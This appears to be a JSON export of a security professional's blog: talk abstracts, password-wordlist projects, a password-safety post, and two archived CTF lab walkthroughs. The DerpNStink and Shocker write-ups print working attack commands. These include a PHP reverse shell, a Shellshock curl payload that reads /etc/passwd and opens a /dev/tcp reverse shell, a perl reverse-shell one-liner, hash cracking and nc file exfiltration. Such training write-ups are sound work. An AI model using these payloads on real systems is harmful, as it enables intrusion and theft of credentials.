
[{"content":"I\u0026rsquo;m Ben. I\u0026rsquo;m from NYC. I\u0026rsquo;ve worked in cybersecurity for a while now.\n","date":"18 April 2026","externalUrl":null,"permalink":"/about/","section":"Main page content","summary":"About this site/me","title":"About This Site/Me","type":"page"},{"content":" ","date":"18 April 2026","externalUrl":null,"permalink":"/","section":"Main page content","summary":"","title":"Main page content","type":"page"},{"content":"","date":"30 October 2025","externalUrl":null,"permalink":"/tags/bug-bounty/","section":"Tags","summary":"","title":"Bug Bounty","type":"tags"},{"content":"","date":"30 October 2025","externalUrl":null,"permalink":"/tags/project/","section":"Tags","summary":"","title":"Project","type":"tags"},{"content":"Research and other publications\n","date":"30 October 2025","externalUrl":null,"permalink":"/publishing/","section":"Publishing","summary":"Research and other publications","title":"Publishing","type":"publishing"},{"content":"","date":"30 October 2025","externalUrl":null,"permalink":"/tags/publishing/","section":"Tags","summary":"","title":"Publishing","type":"tags"},{"content":" Discover how bug hunting teams, independent researchers, and security teams collaborate to uncover vulnerabilities, protect digital assets, and enhance organizational resilience. Learn how bug bounty programs complement traditional security efforts like penetration testing – and why they’re becoming indispensable in today’s threat landscape. 
This session discusses the business benefits of being able to triage, prioritize, and manage bug bounty findings effectively, ensuring that security teams focus on what truly matters: how to cut through the noise and build a program that delivers real value.\n","date":"30 October 2025","externalUrl":null,"permalink":"/publishing/bug-bounty-webinar/","section":"Publishing","summary":"A webinar on how bug bounty programs harness crowdsourced security research to uncover vulnerabilities and strengthen organizational resilience. We discuss how to triage, prioritize, and manage findings effectively alongside traditional pentesting.","title":"Reversec Webinar: Going behind the scenes of bug bounty to strengthen enterprise security","type":"publishing"},{"content":"","date":"30 October 2025","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":" Organizations operate bug bounty programs with the hope of crowdsourcing their security, but how exactly do they work? This talk covers possible steps from the moment a researcher submits a report through triage, reward, retesting and resolution based on internal lived experience with large, mature and sophisticated programs. Learn why companies implement these programs, how they can integrate/balance them with traditional penetration testing and the potential pitfalls along the way.\n","date":"30 June 2025","externalUrl":null,"permalink":"/publishing/bug-bounty-behind-the-scenes/","section":"Publishing","summary":"A video of a talk on how bug bounty programs work from researcher submission through triage, reward, retesting, and resolution. 
Plus, how companies balance them with traditional pentesting and avoid common pitfalls.","title":"Reversec Briefing: Bug Bounty behind the scenes","type":"publishing"},{"content":"An analysis of client-side prototype pollution written by Phil Sofia and me, published originally under WithSecure Labs.\nOffsite Links # Read on Reversec Labs Interactive Demo Archived Version (WithSecure) Archived Demo ","date":"8 September 2022","externalUrl":null,"permalink":"/publishing/prototype-pollution-primer/","section":"Publishing","summary":"A hands-on walkthrough of prototype pollution in JavaScript — how attackers corrupt Object.prototype to achieve DOM-based XSS, with exploit demos and mitigations","title":"Prototype Pollution Primer for Pentesters and Programmers","type":"publishing"},{"content":"","date":"4 December 2019","externalUrl":null,"permalink":"/tags/passwords/","section":"Tags","summary":"","title":"Passwords","type":"tags"},{"content":"My early career magnum opus: Up to 20GB of passwords, sorted by popularity. Make sure your passwords aren’t popular!\nThis has taken on a life of its own, but it\u0026rsquo;s now in places like Seclists and many others. As of this writing, it sits at the 8th most starred repo on GitHub with the password tag 💪\nberzerk0/Probable-Wordlists Version 2 is live! Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren\u0026rsquo;t popular! null 9245 1611 ","date":"4 December 2019","externalUrl":null,"permalink":"/projects/probable-wordlists/","section":"Projects","summary":"My early career magnum opus. 
Wordlists sorted by probability originally created for password generation and testing.","title":"Probable Wordlists","type":"projects"},{"content":"Projects and Tools\n","date":"4 December 2019","externalUrl":null,"permalink":"/projects/","section":"Projects","summary":"Projects page","title":"Projects","type":"projects"},{"content":"Password wordlist generator based on biographical info. An old python project.\nberzerk0/BEWGor Bull\u0026rsquo;s Eye Wordlist Generator - Does your password rely on predictable patterns of accessible info? Python 419 70 ","date":"16 November 2018","externalUrl":null,"permalink":"/projects/bewgor/","section":"Projects","summary":"Bull’s Eye Wordlist Generator - Does your password rely on predictable patterns of accessible info?","title":"BEWGor","type":"projects"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\n","date":"26 March 2018","externalUrl":null,"permalink":"/archive/","section":"Archive","summary":"","title":"Archive","type":"archive"},{"content":"","date":"26 March 2018","externalUrl":null,"permalink":"/tags/archive/","section":"Tags","summary":"","title":"Archive","type":"tags"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nGet the VM here: https://www.vulnhub.com/entry/derpnstink-1,221/\n@securekomodo, the machine\u0026rsquo;s creator, gives us the following:\nYour goal is to remotely attack the VM and find all 4 flags eventually leading you to full root access. Don\u0026rsquo;t forget to #tryharder\nExample: flag1(AB0BFD73DAAEC7912DCDCA1BA0BA3D05). Do not waste time decrypting the hash in the flag as it has no value in the challenge other than an identifier.\nIntroduction # DerpNStink requires knowledge of a wide array of pentesting skills, but doesn\u0026rsquo;t dive particularly deeply into any of them. 
You will use a plethora of tools, but won\u0026rsquo;t have to go too far past the basics of each to get the job done.\nRegardless, I consider this to be a good \u0026ldquo;self-benchmarking\u0026rdquo; CTF. The sheer number of steps involved pushes it towards the \u0026ldquo;intermediate\u0026rdquo; end of the spectrum, even if each of those steps is pretty straightforward.\nDerpNStink is not a great choice for your first CTF, and I did not explain each step with the first-time reader in mind. All tools and methods used are available by default in Kali.\nI\u0026rsquo;ve blurred out any passwords, hashes or keys that aren\u0026rsquo;t defaults.\n1. Initial Scans # The VM is designed to grab an IP from DHCP, and you\u0026rsquo;ll need to find out what that is.\nHit it with a heavy-duty nmap scan for expediency\u0026rsquo;s sake.\nnmap -p- -A 192.168.56.101 -oA nmap_AFullTCP\nFTP at 21 using vsftpd; ssh at 22 using OpenSSH; HTTP at 80 using Apache. From setting up my own VMs, I know these versions are what Ubuntu uses in a Net Install that includes FTP, ssh and HTTP capabilities. nmap also suggests that the box is running Ubuntu.\nThere\u0026rsquo;s also a robots.txt webpage listing /php/ and /temporary as off-limits.\nBefore filling up the server access log, we can visit the site like a regular user and try to gain information quietly.\nhttp://192.168.56.101/\nThe obscure-hint part of my brain sounds a quiet alarm at the name \u0026ldquo;DerpNStink\u0026rdquo;\nCould Derp N\u0026rsquo; Stink lead to DNS?\nSeems pretty thin, especially since I recognize the character on the left as the South Park character Mr. 
Derp, whose \u0026ldquo;antics go straight to the funnybone.\u0026rdquo;\nI\u0026rsquo;ll label this as \u0026ldquo;likely a coincidence,\u0026rdquo; while fighting the urge to try funnybone as the root password.\nLet\u0026rsquo;s visit the areas prohibited by robots.txt.\nhttp://192.168.56.101/php/\nThere isn\u0026rsquo;t anything here that we don\u0026rsquo;t already know, so we\u0026rsquo;ll check /temporary.\nWhen we do, we see it\u0026rsquo;s just a text page saying Try Harder!\nWhen we see trolling like this, we need to keep investigating. Taunts like this may cause you to storm off in a huff of incredulity without digging deeper, but beneath the hijinks is a great place to hide something of value.\nWith this in mind, I looked at the source code of the page and found precisely nothing.\nI managed to get trolled twice by the same page, impressively. However, I took this opportunity to view the source code of the index page.\nWe see some js and css directories that might be worth digging into, but the link to /webnotes/info.txt is most interesting.\nBy looking at the line numbers, we can see there is more to this page than what is initially displayed\u0026hellip;\nflag1 Captured! One down, three to go.\nWhat\u0026rsquo;s at that interesting link?\n2. Maybe \u0026ldquo;DerpNStink\u0026rdquo; Did Actually Hint at \u0026ldquo;DNS\u0026rdquo; # view-source:http://192.168.56.101/webnotes/info.txt\nThis led to another all-text page that contained the following message: \u0026lt;-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live --\u0026gt;\nIt seems we need to update our hosts file to get the full DerpNStink experience. But what should we use as a hostname? Maybe the /webnotes directory itself can offer a clue.\nview-source:http://192.168.56.101/webnotes/\nPaydirt. 
This page gives us 2 useful pieces of information:\nHostname: derpnstink.local Username: stinky@derpnstink.local Add derpnstink.local to your /etc/hosts file with\necho \u0026quot;\u0026lt;DERPNSTINK IP ADDR\u0026gt; derpnstink.local\u0026quot; \u0026gt;\u0026gt; /etc/hosts\nYou had better use \u0026gt;\u0026gt; and NOT \u0026gt; or you will overwrite your hosts file and have problems.\nNow that we know we are directed to the full version of the website, we\u0026rsquo;ll run nikto.\nnikto -h derpnstink.local -o nikto_hostadded_result.txt\n3. DeRPnStiNK Professional Services: The Blog # Nikto thinks the /weblog/ directory might be interesting.\nWe can take this time to read all about Misters Derp and Stinky and their colorful pasts, but the most interesting thing on the page is the phrase Proudly Powered by Wordpress.\nEnter wpscan.\nwpscan -u http://derpnstink.local/weblog/ --enumerate upt\nWPScan delivers tons of useful information. The site is running on an outdated version of Wordpress, and contains a plugin with an Arbitrary File Upload vulnerability. Arbitrary File uploads usually mean shells.\nWe\u0026rsquo;ve also got two usernames, unclestinky and admin. Admin looks like a default user account, and default user accounts often have default passwords.\nhttp://derpnstink.local/weblog/wp-login.php\nadmin:admin\nAnd we\u0026rsquo;re in.\n4. Sliding Our Way Into a User Shell # Surprisingly, we don\u0026rsquo;t have the site\u0026rsquo;s admin control page. This user only has access to one of the plugins.\nBut not just any plugin, the vulnerable plugin. 
It is the one we will use to upload a shell payload.\nThe WPScan result listed that we could find vulnerability details at https://www.exploit-db.com/exploits/34514/, but it is a bit faster to just run\u0026hellip;\nsearchsploit -x 34514\nThe details tell us that this is a very straightforward Arbitrary File Upload, and we just need to follow some simple steps.\nUpload a \u0026ldquo;New Slide\u0026rdquo; using the plugin, choosing the FILE.php containing our payload instead of an image. The file will be accessible at http://derpnstink/wordpress/wp-content/uploads/slideshow-gallery/FILE.php Let\u0026rsquo;s do this.\nOur payload will be the php-reverse-shell from pentestmonkey.net, which can be found on Kali at /usr/share/webshells/php/php-reverse-shell.php. Copy it to your working directory.\ncp /usr/share/webshells/php/php-reverse-shell.php .\nEdit the shell using your favorite text editor so it will connect to your local machine at the correct IP and port.\nset_time_limit (0); $VERSION = \u0026#34;1.0\u0026#34;; $ip = \u0026#39;local.machine.ip.addr\u0026#39;; // CHANGE THIS $port = PORTNUM; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = \u0026#39;uname -a; w; id; /bin/sh -i\u0026#39;; $daemon = 0; $debug = 0; Start your listener before uploading the shell.\nnc -lnvp PORTNUM\nClick on the Slideshow Plugin Panel, and hit the Add New button.\nPopulate the title and description fields and upload the shell file.\nIf your listener is running and you\u0026rsquo;ve set the parameters correctly, the shell will pop as soon as you press \u0026ldquo;Save Slide\u0026rdquo;.\nIn fact, I could just refresh the slideshow plugin page if I needed to resend the shell command. This must be because the plugin control page attempts to show a preview of the image.\nCheck for python, and when you find it, use it to spawn a tty.\nwhich python python -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\n5. 
Science 101 with Professor www-data # Enumeration starts in the home.\nls -l /home\nWe don\u0026rsquo;t have any permissions in the user folders, but that\u0026rsquo;s not what www-data is for. It is used to manage the database and other files used to run the Wordpress site. Therefore, we should try acting like the www-data user and poke around in the website directories.\nIt\u0026rsquo;s time to perform some science. I present two hypotheses:\nObservations #1\nwww-data performs operations needed to run the Wordpress site; Wordpress uses MySQL; MySQL must be logged into using credentials.\nHypothesis #1\nwww-data must \u0026ldquo;know\u0026rdquo; these credentials to access the MySQL database.\nObservations #2\nwww-data can read files in the /var/www/html/weblog directory where Wordpress is installed; one of the files in this directory is called wp-config.php; \u0026ldquo;Config\u0026rdquo; is short for \u0026ldquo;configuration.\u0026rdquo;\nHypothesis #2\nwww-data reads MySQL login credentials from /var/www/html/weblog/wp-config.php, and this would fall under \u0026ldquo;configuration.\u0026rdquo; As a good www-data user, it\u0026rsquo;s our place, nay, our DUTY to look for credentials inside this file. All good science requires experimentation.\ncd /var/www/html ls cd weblog ls\nless wp-config.php\nOur experiment is a great success! You should receive your Nobel prize in the mail in 6-8 weeks.\nWe\u0026rsquo;ve learned that we can log into MySQL using root:mysql. The root username is very promising; we probably have total database access.\n6. 
Raiding MySQL # mysql -u root -p\nUse mysql as the password.\nWith root access we have a buffet of data at our fingertips.\nshow databases;\nIf we can find login credentials, we\u0026rsquo;ll use them to attempt to log in to ssh or Wordpress.\nuse wordpress;\nWordpress hashes take a while to try and crack, but we\u0026rsquo;ll see if we can find them anyway.\nshow tables;\nshow columns from wp_users; select user_login,user_pass from wp_users;\nIf you look closely and see the \u0026ldquo;flag2\u0026rdquo; column, you are more observant than I was! We\u0026rsquo;ll come back to that later.\nSave the user login and user password columns to a local file so we have the option to try and crack the hashes. We already know admin\u0026rsquo;s Wordpress password, so it won\u0026rsquo;t take too long to make a decent effort on unclestinky\u0026rsquo;s hash.\nLet\u0026rsquo;s see what\u0026rsquo;s in the database called mysql.\nshow databases; use mysql; show tables;\nMySQL hashes are not very computationally expensive, so we\u0026rsquo;ll try to crack them before making any attempts on the Wordpress hashes.\nshow columns from user; select User,Password from user;\nSave these to a local file called mysql_db.txt, and we\u0026rsquo;ll feed them to John The Ripper. john is a bit of a picky eater, though, so we need to conform them to the username:hash format.\nWe can do this with a beastly one-liner that uses cat, grep, tr, cut and sort.\ncat mysql_db.txt | egrep -i '[a-f0-9]{32}' | tr -d '[[:blank:]]' | tr '|' ':' | cut -d ':' -f 2,3 | sort -u \u0026gt; mysql_hashes.txt\nI\u0026rsquo;ve broken down the one-liner into stages so you can see how we arrived at the final product. I\u0026rsquo;m not certain that it is the most efficient, shortest possible command, but it works.\nWe\u0026rsquo;ll use the trusty rockyou wordlist that comes with Kali, and is the agreed-upon wordlist for CTF-ing. 
You can find it in /usr/share/wordlists/, but you may have to unarchive it.\njohn mysql_hashes.txt --format=mysql-sha1 --wordlist=/usr/share/wordlists/rockyou.txt\nWe crack 2 of the hashes, and come away with UncleStinky\u0026rsquo;s password. There is a good chance that UncleStinky uses this password everywhere, and it may be his user password.\nWe already know that there is a stinky user on this machine, so let\u0026rsquo;s try to su our way over.\nexit su stinky\n7. The Key is Guarded By A Troll(ing Attempt) # We are stinky, but so is this shell. Let\u0026rsquo;s try to log in to ssh now that we\u0026rsquo;ve got the password.\nssh stinky@derpnstink.local\nWe need to dig up the ssh key. Odds are it is in stinky\u0026rsquo;s home directory.\ncd ~ ls ls *\nA flag has been left here for us to Capture.\ncat Desktop/flag.txt\nThe output of this cat shows text that includes flag3(...)\nUh oh, the last one we captured was flag1. I suppose we missed flag2. We\u0026rsquo;ll likely have an easier time finding it as root, so we\u0026rsquo;ll simply continue down the path to pwnership.\n2 flags down, 2 flags to go.\nIn addition to Desktop/flag.txt, we also see Documents/derpissues.pcap. That may contain valuable information; we will investigate shortly. For now, we want that ssh key. It might be in the ftp files, so let\u0026rsquo;s dig.\nls ftp/files ls ftp/files/ssh ls ftp/files/ssh/ssh\nVery funny, stinky. I get the feeling we are being trolled, but that\u0026rsquo;s a reason to continue. Luckily, we know that ls has the recursive -R flag.\nThe presence of the network-logs folder further suggests that the pcap file will have something important to offer.\nls -R ftp/files/ssh\nYes, that\u0026rsquo;s seven directories deep.\ncd ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh\nI fully expect this to be a text document containing the message this isn't the ssh key with an ASCII middle finger.\ncat key.txt\nIt\u0026rsquo;s actually a key, hooray! 
Send it to your local machine using nc and we should be able to log in to ssh.\nFirst, we need to see if stinky can use nc. In the stinkshell, run a which command.\nwhich nc\nThis will show that nc is there for us to use.\nSet up the listener on your local machine, making sure to use a different port than you used for the php-reverse-shell.\nnc -lnvp PORTNUMBER \u0026gt; key.txt\nSend the file from the stinkshell over to your local machine.\nnc local.machine.ip.addr PORTNUMBER \u0026lt; key.txt\nWhen you receive the key, you\u0026rsquo;ll need to change the file permissions or ssh will complain.\nchmod 600 key.txt\nInclude the -i flag with your ssh command to use the key.\nssh stinky@derpnstink.local -i key.txt\n8. Sniffing with \u0026ldquo;Stinky\u0026rdquo; # We\u0026rsquo;ve got a good shell now; let\u0026rsquo;s see if stinky can run sudo with anything interesting.\nsudo -l\nThis results in a message saying that stinky is unable to run sudo.\nThe derpissues.pcap file is waiting for us, but pcap files can be pretty extensive. It can be hard to find the right packets amongst everything flying around.\nMaybe the /ftp/files/network-logs directory can help provide context.\nls /ftp/files/network-logs\nIn that folder is a file named derpissues.txt. Let\u0026rsquo;s take a peek.\ncat ftp/files/network-logs/derpissues.txt\nIf Mr. Derp set up a Wordpress user account while the network was being sniffed, then there will be a packet containing the password to his account.\nWe can use the same nc process we used to transfer the ssh key to transfer derpissues.pcap to our local machine. 
From there, we can open it up in wireshark and hunt down those credentials.\ncd Documents ls\nEnable the listener on your local machine:\nnc -lnvp 53000 \u0026gt; derpissues.pcap\nStart the transfer from the stinky ssh shell:\nnc 192.168.56.1 53000 \u0026lt; derpissues.pcap\nUpon arrival, open it on your local machine using wireshark:\nwireshark derpissues.pcap\nA lot of info was captured in this file, but we only care about Mr. Derp\u0026rsquo;s interaction with the Wordpress site over http. Even more specifically, we only care about information Mr. Derp sent to the server via POST request.\nWith the right filter, Wireshark will only show us these requests.\nhttp.request.method == \u0026quot;POST\u0026quot;\nThere weren\u0026rsquo;t very many sent, so we can simply browse the Info column for something interesting.\nuser-new.php sounds like the page Mr. Derp would send a request to in order to create his account. This would be where he\u0026rsquo;d enter his password.\nSelect the HTML Form URL encoded part of the packet, and look at the values. There, in the clear, is Mr. Derp\u0026rsquo;s rather unsurprising password. Unfortunately, it was not funnybone.\nThis is why we use HTTPS.\nIf mrderp is anything like stinky, he will reuse passwords. Simply su your way to the mrderp account from the ssh window.\nsu mrderp\n9. If You Like sudo, Then You\u0026rsquo;re Gonna Love Mr. Derp! # If stinky acted as the webmaster, then perhaps mrderp is the boss of this machine.\nsudo -l\nWhen I saw this, I was shocked, appalled, and delighted. Does the sudoers file allow WILDCARDS? 
Dangerous.\n(ALL) /home/mrderp/binaries/derpy* means that anything we put in the /home/mrderp/binaries directory with a filename that begins with derpy can be run as root.\nWe want a root shell, so we just need to create a little script that spawns one.\nmkdir binaries cd binaries nano derpyshell.sh\nWe just need a crunchbang and a shell command.\n#!/bin/sh /bin/bash To save and exit nano, press ctrl+x, Y, and enter.\nFinally, make the script executable.\nchmod +x derpyshell.sh\nRun it with sudo, and you\u0026rsquo;ll be root.\nsudo ./derpyshell.sh\n10. Final Flag Roundup # flag4 is kept in the /root directory, so head on over and read it with cat.\n3 down, one to go. We have flags 1, 3 and 4 - but where is flag2?\nSince we found flag1 on the website, and flag3 was found while accessing the machine as stinky, I concluded that flag2 must be between those two points.\nThis corresponded to the parts where we enumerated the website, found the blog, spawned our php-shell, and raided the databases. All of these actions were related to files kept in /var/www/html, which, as root, we have complete control over.\nThe flags used the flagN format, so we should head over to the directory and grep for flag2.\ncd /var/www/html/ grep -iR 'flag2' *\nNothing jumps out from this search, but there is still a decent chance the flag is on the website somewhere. Where haven\u0026rsquo;t we looked? Hmm..\nAs soon as we cracked stinky\u0026rsquo;s password, we logged right into ssh. We never even tried to log into his Wordpress account.\nUncleStinky is the Wordpress Admin, and he has saved a draft of a blog post. That draft is named \u0026ldquo;Flag.txt,\u0026rdquo; and contains the elusive flag2.\nAll Flags Captured!\nPost-Mortem # Like most CTFs, this box was intentionally made vulnerable for fun\u0026rsquo;s sake. 
However, all of these vulnerabilities can be found in the real world.\nHere\u0026rsquo;s what made DerpNStink rootable.\nUse of Default/Obvious Credentials\nadmin:admin logged into Wordpress. This really can be found in the real world. Just ask Equifax Argentina. root:mysql was all it took to get complete control of the MySQL database.\nLeast Privilege Violations\nThe admin Wordpress user did not have administrative control over the site, but could still control the Slideshow plugin. While logged into the system as www-data, we could look at stinky\u0026rsquo;s home directory. Why would this be necessary?\nOutdated Versions of Plugins/3rd Party Software\nThe slideshow plugin was using a vulnerable version from 2014, which has since been patched. While this version was obviously put in place to allow Arbitrary File Upload for the CTF, real webmasters may think maintenance of 3rd Party software isn\u0026rsquo;t their problem. Vendors can release a patch, but the sysadmin must actually install it.\nCredential Reuse\nBoth users of this system had a single password that was used for both Wordpress and system access. Unfortunately, this practice is as common as it is dangerous.\nWeak Passwords\nstinky\u0026rsquo;s password (they only used one) was entirely alphanumeric, and used the minimum number of characters commonly allowed. Since we were likely meant to crack this password from a hash, it was also part of the famous rockyou wordlist.\nLack of HTTPS\nmrderp\u0026rsquo;s password had a very secure length of 28 characters - we weren\u0026rsquo;t going to find it via brute force. However, the password was sniffed out using packet capture due to the fact that the web page used unencrypted HTTP. Thanks for reading! 
# ","date":"26 March 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/derpnstink-vulnhub/","section":"Archive","summary":"","title":"CTF Writeup: DerpNStink on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nThese aren’t the only CTFs I’ve ever done, of course.\n","date":"26 March 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/","section":"Archive","summary":"Write-ups/Walkthroughs of CTF challenges from 2017 and 2018","title":"CTF Writeups","type":"archive"},{"content":"","date":"26 March 2018","externalUrl":null,"permalink":"/tags/ctf-writeup/","section":"Tags","summary":"","title":"Ctf-Writeup","type":"tags"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # Shocker is one of those CTFs designed to give the player first-hand experience implementing a famous vulnerability. Like Blue before it, it is a beginner CTF that requires prior knowledge or a bit of outside-the-box thinking.\nThe severity of these vulnerabilities is what made them so famous, and once you\u0026rsquo;ve employed them, root access is not far behind. Shocker\u0026rsquo;s root doesn\u0026rsquo;t crack exactly as easily as Blue\u0026rsquo;s, but is still a trivial privesc.\nThis write-up assumes that the reader is using Kali, but any pentesting distro such as BlackArch will work.\n1. Initial Scans # A quick nmap scan starts us off on the right foot.\nnmap -F -sV 10.10.10.56 -oG nmap_quicksearch We\u0026rsquo;ll write the output to a grep-able format using the -oG flag.\nStarting Nmap 7.60 \\( https://nmap.org ) at 2018-02-17 13:36 EST Nmap scan report for 10.10.10.56 Host is up (0.036s latency). Not shown: 99 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds Looks like HTTP is the way to move forward. If we hit a brick wall, we\u0026rsquo;ll come back and scan more ports.\nnikto and dirsearch are the HTTP-scanning gruesome twosome. Let\u0026rsquo;s set them loose.\nnikto -h 'http://10.10.10.56' -o nikto_result.txt - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.56 + Target Hostname: 10.10.10.56 + Target Port: 80 --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + Server leaks inodes via ETags, header found with file /, fields: 0x89 0x559ccac257884 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found. + 8310 requests: 0 error(s) and 6 item(s) reported on remote host --------------------------------------------------------------------------- + 1 host(s) tested nikto has told us the same information that the nmap quickscan has, but not much else.\nThe box runs Apache 2.4.18; the box runs Ubuntu. We\u0026rsquo;ll start with the shallowest dirsearch scan, and dive deeper if necessary.\ndirsearch -u 'http://10.10.10.56' -e php,html,js,txt --plain-text-report=dirsearch_quick _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php, html, js, txt | Threads: 10 | Wordlist size: 6996 Target: http://10.10.10.56 ...(some uninteresting results)... 
[13:41:31] 403 - 294B - /cgi-bin/ [13:41:37] 200 - 137B - /index.html [13:41:44] 403 - 299B - /server-status [13:41:44] 403 - 300B - /server-status/ Those directories are the most interesting, but let\u0026rsquo;s try our patented \u0026ldquo;dual bio-optical scan.\u0026rdquo;\nThis creature wants to be left alone and appears willing to defend itself with that hammer if needed.\nWhat a strange little image.\nWe can download it and check it for steganography, but I wasn\u0026rsquo;t able to find anything. Since this image is our only lead on the webpage, it is worth further investigation. Take a page from the OSINT book and hit it with a reverse image search.\nHmm\u0026hellip; these results aren\u0026rsquo;t very specific. Maybe we can add more detail to our search and get better results.\nOur bug has a message for us, \u0026ldquo;Don\u0026rsquo;t bug me!\u0026rdquo;\nAt first, these results seem similar to our first search. They might even be worse. However, a very interesting result lies just a scroll down the page.\nThe included text tells a very interesting story: The Bash Bug - also going by the nickname \u0026ldquo;Shellshock\u0026rdquo; - has been discovered this week and identified as a serious threat to computers of all kinds\u0026hellip;\nWe\u0026rsquo;d like to pose a \u0026ldquo;serious threat\u0026rdquo; to this CTF, and with a box name of Shocker, we just might.\n2. Bashing the Bug/Shocking the Shell # We originally found the image at this Slashgear article, which itself linked to this SecLists post. The SecLists post explained that using a clever combination of curly brackets and semicolons in an HTTP request, we may be able to get code injection on a webserver.\nOur box is nothing but a webserver, as far as we can tell. 
We can use curl to send custom HTTP requests, as soon as we find out just where they should go.\nSome more searching led me to this GitHub page by opsxcq which outlined a beautiful one-line command to read the /etc/passwd file of a system vulnerable to ShellShock.\ncurl -H \u0026#34;user-agent: () { :; }; echo; echo; /bin/bash -c \u0026#39;cat /etc/passwd\u0026#39;\u0026#34; http://localhost:8080/cgi-bin/vulnerable Where could our /vulnerable file be?\nIn order to use ShellShock, we need to aim our request at a shell script. Shell scripts often carry the .sh extension, and are used to run commands directly in the system shell. The /etc/passwd example used a /cgi-bin/ directory, which we have already discovered exists on our box as well. We can point dirsearch at our box\u0026rsquo;s /cgi-bin/ directory and tell it to look for files with the sh extension.\ndirsearch -u 'http://10.10.10.56/cgi-bin/' -e sh --plain-text-report=dirsearch_shellsearch Hello there\u0026hellip;\nWe can alter opsxcq\u0026rsquo;s one-liner to include the correct HTTP location and give it a test run.\ncurl -H \u0026quot;user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'\u0026quot; 'http://10.10.10.56/cgi-bin/user.sh' We\u0026rsquo;ve done it, command injection. Time to drop in a reverse shell command.\nFirst, start your listener.\nnc -lnvp PORTNUM Then, bundle a reverse shell command into the ShellShock one-liner, and run it in another terminal.\ncurl -H \u0026quot;user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i \u0026gt;\u0026amp; /dev/tcp/local.machine.HTB.ip/PORTNUM 0\u0026gt;\u0026amp;1'\u0026quot; http://10.10.10.56/cgi-bin/user.sh\n3. A User Named \u0026ldquo;Shelly\u0026rdquo; - GET IT? 
# Retrieve the user flag.\nls ~ cat ~/user.txt shelly@Shocker:/home/shelly$ ls ~ user.txt shelly@Shocker:/home/shelly$ cat ~/user.txt User Flag Captured!\nTime to see what Shelly can do besides make puns.\nsudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl Shelly can run perl as root using sudo without a password!\nAll that stands between us and a root shell is finding the right command.\nFrom my trusty Red Team Field Manual by Ben Clark, I found this:\nperl -e 'use Socket;$i=\u0026quot;local.machine.ip.addr\u0026quot;;$p=PORTNUM;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\u0026quot;tcp\u0026quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);open(STDOUT,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);open(STDERR,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);exec(\u0026quot;/bin/sh -i\u0026quot;);};'\nStart a second listener on your local machine at a new port, then run the command below.\nsudo perl -e 'use Socket;$i=\u0026quot;local.machine.HTB.ip\u0026quot;;$p=PORTNUM_B;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\u0026quot;tcp\u0026quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);open(STDOUT,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);open(STDERR,\u0026quot;\u0026gt;\u0026amp;S\u0026quot;);exec(\u0026quot;/bin/sh -i\u0026quot;);};'\n4. Root Flag # We\u0026rsquo;re the boss.\nls ~ cat ~/root.txt # ls ~ root.txt # cat ~/root.txt Root Flag Captured!\nConclusion # When doing CTFs, you have the benefit of decades of security history to support you. There is no substitute for experience, but browsing through the timeline of major cybersecurity stories might just be the next best thing. 
Studying bugs like this gives you an idea of real-world scenarios and what kinds of attacks actually have worked.\nThanks to HackTheBox and mrb3n!\nThanks for reading! # ","date":"17 February 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/shocker-htb/","section":"Archive","summary":"","title":"CTF Writeup: Shocker on HackTheBox","type":"archive"},{"content":"","date":"8 February 2018","externalUrl":null,"permalink":"/blog/","section":"Blogs","summary":"","title":"Blogs","type":"blog"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nMake your passwords secure, and keep them that way!\nDo you know how to create a secure password? # Did you know that many people use the same passwords, and that a savvy guesser tries these first? Did you know that password length can be the easiest way to be more secure?\nDo you re-use passwords across multiple accounts? # DO NOT RE-USE PASSWORDS ACROSS ACCOUNTS. Full stop. Don\u0026rsquo;t do it. Seriously. Password conventions can help you remember as many unique passwords as you want. I\u0026rsquo;ll tell you how to set one up.\nDo you know about 2-Factor Authentication? # In some cases, it can keep you safe even if your password is compromised.\nTake These Small Steps to Vastly Increase Your Password Security # Even if you have no reason to think you have been compromised #\nTURN ON TWO-FACTOR AUTHENTICATION\nChange Your LinkedIn Password - Why?\nConsider signing up at https://haveibeenpwned.com/ to be alerted if your info gets leaked.\nConsider running your information through Hacked-Emails\nIf you are guilty of password reuse - stop it. Change those passwords, as soon as possible.\nTwo-factor authentication adds another step 